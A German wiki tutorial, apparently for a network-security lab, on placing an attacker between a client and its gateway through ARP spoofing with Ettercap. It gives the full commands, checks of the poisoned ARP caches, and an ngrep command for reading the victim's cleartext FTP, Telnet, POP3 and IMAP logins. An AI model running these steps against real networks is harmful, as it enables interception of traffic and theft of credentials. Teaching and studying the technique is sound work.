Arpspoofing mit Ettercap Gateway vorgauckeln Grundsätzlich

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Ettercap: MITM zwischen Client und Gateway

Szenario

  • CLIENT=10.0.10.104
  • GATEWAY=10.0.10.1
  • INTERFACE=eth0

Der Angreifer schaltet sich per ARP-Spoofing zwischen den CLIENT und das GATEWAY. Damit laeuft der gesamte Verkehr, den der CLIENT ins Internet oder in andere Netze schickt, ueber den Angreifer. Das ist der klassische Fall zum Abhoeren des Internet-Verkehrs eines einzelnen Opfers.

Benoetigtes Paket

  • apt-get install ettercap-graphical
Das Paket ettercap-graphical enthaelt sowohl die grafische Oberflaeche als auch
den hier verwendeten Textmodus (-T). Ein separates Paket fuer die Konsole ist
nicht noetig.

Befehl

  • ettercap -i $INTERFACE -Tq -M arp /$CLIENT// /$GATEWAY//

Optionen

-i eth0    =  Interface
-T         =  Textmodus
-q         =  still (keine Paketinhalte fortlaufend ausgeben)
-M arp     =  ARP-Spoofing als MITM-Methode

Zieldefinition

TARGET1 /$CLIENT// und TARGET2 /$GATEWAY//
Die Zielangabe hat die Form /MAC/IP/PORT/ - leere Felder bedeuten "alles".
/10.0.10.104// heisst also: beliebige MAC, IP 10.0.10.104, alle Ports.
Ettercap vergiftet beide Richtungen: der CLIENT glaubt, der Angreifer sei das
GATEWAY, und das GATEWAY glaubt, der Angreifer sei der CLIENT.

Nachweis auf dem CLIENT

Im ARP-Cache steht fuer das GATEWAY die MAC-Adresse des Angreifers
  • arp -n | grep 10.0.10.1
10.0.10.1     ether   <MAC-der-kali-innen>   C   eth0
Der CLIENT schickt seine Pakete jetzt an den Angreifer, statt ans echte Gateway.

Nachweis auf dem GATEWAY

Im ARP-Cache steht fuer den CLIENT dieselbe MAC-Adresse
  • arp -n | grep 10.0.10.104
10.0.10.104   ether   <MAC-der-kali-innen>   C   eth0
Beide Seiten tragen fuer unterschiedliche IPs dieselbe MAC ein - das ist der Beleg
fuer den laufenden MITM.

Was jetzt sichtbar wird

Der gesamte Verkehr des CLIENT laeuft ueber den Angreifer. Auf einem zweiten
Terminal laesst sich der Klartext-Anteil mitlesen, z.B. mit ngrep
  • ngrep -d $INTERFACE -q -W byline "" host 10.0.10.104 and tcp
Interessant sind die Klartext-Dienste
21   FTP     Login + Passwort im Klartext
23   Telnet  komplette Sitzung im Klartext
80   HTTP    unverschluesselter Web-Verkehr
110  POP3    Login + Passwort im Klartext
143  IMAP    Login + Passwort im Klartext
HTTPS, SSH und andere verschluesselte Dienste laufen zwar ebenfalls ueber den
Angreifer, sind aber nicht im Klartext lesbar. Genau das ist die Lehre
MITM
funktioniert weiterhin, aber Verschluesselung entwertet den Mitschnitt.

Angriff beenden

Ettercap mit q beenden. Beim sauberen Beenden schickt ettercap korrekte
ARP-Antworten (re-ARP), damit die ARP-Caches von CLIENT und GATEWAY wieder
auf die echten MAC-Adressen zeigen und das Opfer normal weiterarbeiten kann.

Weiterfuehrende Angriffe